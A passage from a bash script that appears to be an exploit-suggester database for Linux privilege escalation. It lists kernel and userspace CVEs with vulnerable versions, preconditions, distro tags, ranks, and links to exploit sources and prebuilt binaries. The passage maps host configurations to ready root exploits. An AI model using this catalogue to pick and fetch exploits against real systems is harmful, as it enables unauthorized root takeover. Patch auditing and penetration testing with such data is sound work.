Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Rank: 1
analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exploit-db: 39166
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-0728]${txtrst} keyring
Reqs: pkg=linux-kernel,ver>=3.10,ver<4.4.1
Tags:
Rank: 0
analysis-url: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
exploit-db: 40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-2384]${txtrst} usb-midi
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.4.8
Tags: ubuntu=14.04,fedora=22
Rank: 1
analysis-url: https://xairy.github.io/blog/2016/cve-2016-2384
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
exploit-db: 41999
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4997]${txtrst} target_offset
Reqs: pkg=linux-kernel,ver>=4.4.0,ver<=4.4.0,cmd:grep -qi ip_tables /proc/modules
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip
Comments: ip_tables.ko needs to be loaded
exploit-db: 40049
author: Vitaly 'vnik' Nikolenko
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4557]${txtrst} double-fdput()
Reqs: pkg=linux-kernel,ver>=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
exploit-db: 40759
author: Jann Horn
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5195]${txtrst} dirtycow
Reqs: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Rank: 4
analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
exploit-db: 40611
author: Phil Oester
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5195]${txtrst} dirtycow 2
Reqs: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 4
analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
exploit-db: 40839
author: FireFart (author of exploit at EDB 40839); Gabriele Bonacini (author of exploit at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-8655]${txtrst} chocobo_root
Reqs: pkg=linux-kernel,ver>=4.4.0,ver<4.9,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2016/12/06/1
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/CVE-2016-8655/chocobo_root
exploit-db: 40871
author: rebel
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-9793]${txtrst} SO_{SND|RCV}BUFFORCE
Reqs: pkg=linux-kernel,ver>=3.11,ver<4.8.14,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags:
Rank: 1
analysis-url: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
exploit-db: 41995
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-6074]${txtrst} dccp
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my]
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/02/22/3
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
exploit-db: 41458
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-7308]${txtrst} af_packet
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Rank: 1
analysis-url: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-7308/exploit
exploit-db: 41994
author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-16995]${txtrst} eBPF_verifier
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Rank: 5
analysis-url: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-16995/exploit.out
exploit-db: 45010
author: Rick Larabee
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000112]${txtrst} NETIF_F_UFO
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.13,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/08/13/1
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-1000112/exploit.out
exploit-db:
author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000253]${txtrst} PIE_stack_corruption
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Rank: 1
analysis-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
src-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
exploit-db: 42887
author: Qualys
Comments:
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-5333]${txtrst} rds_atomic_free_op NULL pointer dereference
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.13,cmd:grep -qi rds /proc/modules,x86_64
Tags: ubuntu=16.04{kernel:4.4.0|4.8.0}
Rank: 1
src-url: https://gist.githubusercontent.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4/raw/959325819c78248a6437102bb289bb8578a135cd/cve-2018-5333-poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2018-5333/cve-2018-5333.c
Comments: rds.ko kernel module needs to be loaded. Modified version at 'ext-url' adds support for additional targets and bypassing KASLR.
author: wbowling (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-18955]${txtrst} subuid_shell
Reqs: pkg=linux-kernel,ver>=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ]
Tags: ubuntu=18.04{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
exploit-db: 45886
author: Jann Horn
Comments: CONFIG_USER_NS needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-13272]${txtrst} PTRACE_TRACEME
Reqs: pkg=linux-kernel,ver>=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
exploit-db: 47133
exploit-db: 47163
author: Jann Horn (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-15666]${txtrst} XFRM_UAF
Reqs: pkg=linux-kernel,ver>=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y
Tags:
Rank: 1
analysis-url: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
bin-url: https://github.com/duasynt/xfrm_poc/raw/master/lucky0
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
author: Vitaly 'vnik' Nikolenko
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-27365]${txtrst} linux-iscsi
Reqs: pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y
Tags: RHEL=8
Rank: 1
analysis-url: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
src-url: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
author: GRIMM
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3490]${txtrst} eBPF ALU32 bounds tracking for bitwise ops
Reqs: pkg=linux-kernel,ver>=5.7,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Rank: 5
analysis-url: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
src-url: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
author: chompie1337
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-22555]${txtrst} Netfilter heap out-of-bounds write
Reqs: pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6
Tags: ubuntu=20.04{kernel:5.8.0-*}
Rank: 1
analysis-url: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
src-url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
exploit-db: 50135
author: theflow (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

############ USERSPACE EXPLOITS ###########################
n=0

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-0186]${txtrst} samba
Reqs: pkg=samba,ver<=2.2.8
Tags: 
Rank: 1
exploit-db: 23674
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-1185]${txtrst} udev
Reqs: pkg=udev,ver<141,cmd:[[ -f /etc/udev/rules.d/95-udev-late.rules || -f /lib/udev/rules.d/95-udev-late.rules ]]
Tags: ubuntu=8.10|9.04
Rank: 1
exploit-db: 8572
Comments: Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed 
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-1185]${txtrst} udev 2
Reqs: pkg=udev,ver<141
Tags:
Rank: 1
exploit-db: 8478
Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-0832]${txtrst} PAM MOTD
Reqs: pkg=libpam-modules,ver<=1.1.1
Tags: ubuntu=9.10|10.04
Rank: 1
exploit-db: 14339
Comments: SSH access to non privileged user is needed
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-4170]${txtrst} SystemTap
Reqs: pkg=systemtap,ver<=1.3
Tags: RHEL=5{systemtap:1.1-3.el5},fedora=13{systemtap:1.2-1.fc13}
Rank: 1
author: Tavis Ormandy
exploit-db: 15620
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2011-1485]${txtrst} pkexec
Reqs: pkg=polkit,ver=0.96
Tags: RHEL=6,ubuntu=10.04|10.10
Rank: 1
exploit-db: 17942
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2011-2921]${txtrst} ktsuss
Reqs: pkg=ktsuss,ver<=1.4
Tags: sparky=5|6
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2011/08/13/2
src-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2011-2921/ktsuss-lpe.sh
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0809]${txtrst} death_star (sudo)
Reqs: pkg=sudo,ver>=1.8.0,ver<=1.8.3
Tags: fedora=16 
Rank: 1
analysis-url: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
exploit-db: 18436
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0476]${txtrst} chkrootkit
Reqs: pkg=chkrootkit,ver<0.50
Tags: 
Rank: 1
analysis-url: http://seclists.org/oss-sec/2014/q2/430
exploit-db: 33899
Comments: Rooting depends on the crontab (up to one day of delay)
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-5119]${txtrst} __gconv_translit_find
Reqs: pkg=glibc|libc6,x86
Tags: debian=6
Rank: 1
analysis-url: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz
exploit-db: 34421
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1862]${txtrst} newpid (abrt)
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: fedora=20
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
exploit-db: 36746
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3315]${txtrst} raceabrt
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: fedora=19{abrt:2.1.5-1.fc19},fedora=20{abrt:2.2.2-2.fc20},fedora=21{abrt:2.3.0-3.fc21},RHEL=7{abrt:2.1.11-12.el7}
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/130
src-url: https://gist.githubusercontent.com/taviso/fe359006836d6cd1091e/raw/32fe8481c434f8cad5bcf8529789231627e5074c/raceabrt.c
exploit-db: 36747
author: Tavis Ormandy
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1318]${txtrst} newpid (apport)
Reqs: pkg=apport,ver>=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern
Tags: ubuntu=14.04
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
exploit-db: 36746
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1318]${txtrst} newpid (apport) 2
Reqs: pkg=apport,ver>=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern
Tags: ubuntu=14.04.2
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
exploit-db: 36782
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3202]${txtrst} fuse (fusermount)
Reqs: pkg=fuse,ver<2.9.3
Tags: debian=7.0|8.0,ubuntu=*
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/520
exploit-db: 37089
Comments: Needs cron or system admin interaction
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1815]${txtrst} setroubleshoot
Reqs: pkg=setroubleshoot,ver<3.2.22
Tags: fedora=21
Rank: 1
exploit-db: 36564
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3246]${txtrst} userhelper
Reqs: pkg=libuser,ver<=0.60
Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
Rank: 1
analysis-url: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt 
exploit-db: 37706
Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-5287]${txtrst} abrt/sosreport-rhel7
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: RHEL=7{abrt:2.1.11-12.el7}
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2015/12/01/1
src-url: https://www.openwall.com/lists/oss-security/2015/12/01/1/1
exploit-db: 38832
author: rebel
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-6565]${txtrst} not_an_sshnuke
Reqs: pkg=openssh-server,ver>=6.8,ver<=6.9
Tags:
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/01/26/2
exploit-db: 41173
author: Federico Bento
Comments: Needs admin interaction (root user needs to login via ssh to trigger exploitation)
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8612]${txtrst} blueman set_dhcp_handler d-bus privesc
Reqs: pkg=blueman,ver<2.0.3
Tags: debian=8{blueman:1.23}
Rank: 1
analysis-url: https://twitter.com/thegrugq/status/677809527882813440
exploit-db: 46186
author: Sebastian Krahmer
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1240]${txtrst} tomcat-rootprivesc-deb.sh
Reqs: pkg=tomcat
Tags: debian=8,ubuntu=16.04
Rank: 1
analysis-url: https://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
src-url: http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh
exploit-db: 40450
author: Dawid Golunski
Comments: Affects only Debian-based distros
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1247]${txtrst} nginxed-root.sh
Reqs: pkg=nginx|nginx-full,ver<1.10.3
Tags: debian=8,ubuntu=14.04|16.04|16.10
Rank: 1
analysis-url: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
src-url: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
exploit-db: 40768
author: Dawid Golunski
Comments: Rooting depends on cron.daily (up to 24h of delay). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0; gentoo: <1.10.2-r3
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1531]${txtrst} perl_startup (exim)
Reqs: pkg=exim,ver<4.86.2
Tags: 
Rank: 1
analysis-url: http://www.exim.org/static/doc/CVE-2016-1531.txt
exploit-db: 39549
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1531]${txtrst} perl_startup (exim) 2
Reqs: pkg=exim,ver<4.86.2
Tags: 
Rank: 1
analysis-url: http://www.exim.org/static/doc/CVE-2016-1531.txt
exploit-db: 39535
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4989]${txtrst} setroubleshoot 2
Reqs: pkg=setroubleshoot
Tags: RHEL=6|7
Rank: 1
analysis-url: https://c-skills.blogspot.com/2016/06/lets-feed-attacker-input-to-sh-c-to-see.html
src-url: https://github.com/stealth/troubleshooter/raw/master/straight-shooter.c
exploit-db:
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5425]${txtrst} tomcat-RH-root.sh
Reqs: pkg=tomcat
Tags: RHEL=7
Rank: 1
analysis-url: http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
src-url: http://legalhackers.com/exploits/tomcat-RH-root.sh
exploit-db: 40488
author: Dawid Golunski
Comments: Affects only RedHat-based distros
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-6663,CVE-2016-6664|CVE-2016-6662]${txtrst} mysql-exploit-chain
Reqs: pkg=mysql-server|mariadb-server,ver<5.5.52
Tags: ubuntu=16.04.1
Rank: 1
analysis-url: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
src-url: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
exploit-db: 40678
author: Dawid Golunski
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-9566]${txtrst} nagios-root-privesc
Reqs: pkg=nagios,ver<4.2.4
Tags:
Rank: 1
analysis-url: https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
src-url: https://legalhackers.com/exploits/CVE-2016-9566/nagios-root-privesc.sh
exploit-db: 40921
author: Dawid Golunski
Comments: Allows priv escalation from nagios user or nagios group
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-0358]${txtrst} ntfs-3g-modprobe
Reqs: pkg=ntfs-3g,ver<2017.4
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
exploit-db: 41356
author: Jann Horn
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-5899]${txtrst} s-nail-privget
Reqs: pkg=s-nail,ver<14.8.16
Tags: ubuntu=16.04,manjaro=16.10
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2017/01/27/7
src-url: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
author: wapiflapi (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000367]${txtrst} Sudoer-to-root
Reqs: pkg=sudo,ver<=1.8.20,cmd:[ -f /usr/sbin/getenforce ]
Tags: RHEL=7{sudo:1.8.6p7}
Rank: 1
analysis-url: https://www.sudo.ws/alerts/linux_tty.html
src-url: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
exploit-db: 42183
author: Qualys
Comments: Needs to be sudoer. Works only on SELinux enabled systems
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000367]${txtrst} sudopwn
Reqs: pkg=sudo,ver<=1.8.20,cmd:[ -f /usr/sbin/getenforce ]
Tags:
Rank: 1
analysis-url: https://www.sudo.ws/alerts/linux_tty.html
src-url: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
exploit-db:
author: c0d3z3r0
Comments: Needs to be sudoer. Works only on SELinux enabled systems
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000370]${txtrst} linux_ldso_hwcap
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
exploit-db: 42274
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000371]${txtrst} linux_ldso_dynamic
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
exploit-db: 42276
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000379]${txtrst} linux_ldso_hwcap_64
Reqs: pkg=glibc|libc6,ver<=2.25,x86_64
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Rank: 1
